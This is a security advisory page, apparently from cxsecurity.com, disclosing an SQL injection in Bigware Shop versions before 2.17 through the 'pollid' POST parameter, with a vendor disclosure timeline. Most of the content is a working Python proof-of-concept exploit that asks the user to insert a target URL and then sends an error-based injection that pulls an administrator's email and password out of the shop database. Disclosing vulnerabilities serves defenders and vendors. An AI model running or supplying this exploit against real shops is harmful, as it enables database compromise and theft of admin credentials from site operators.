Bigware Shop SQL Injection

2012.06.06
Credit: dw-itsecurity.de
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

The Bigware shop software prior to version 2.17 contains a SQL injection, resulting in full database compromise. The injection point is the POST parameter 'pollid' in the module main_bigware_54.php. Proof of concept is at: http://files.dw-itsecurity.de/54.zip Time line: 01/23/2012: Vendor contacted 01/24/2012: Vendor response 04/16/2012: Vendor patch release 06/05/2012: Disclosure Proof of concept: #!/usr/bin/python # -*- coding: utf-8 -*- import httplib2 import urllib import sys # insert your target link here (with trailing slash) url = "http://www.shopsite.com/" h = httplib2.Http() # send sql injection headerdata = {'Content-type': 'application/x-www-form-urlencoded'} sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' postdata = { 'voteid' : '2', \ 'pollid' : sqli, \ 'x' : '1', \ 'y' : '1', \ 'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'} response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata)) print content, "\n", "\n" print "If there is an error stating the duplicate admin entry, your shop is vulnerable."

References:

http://files.dw-itsecurity.de/54.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top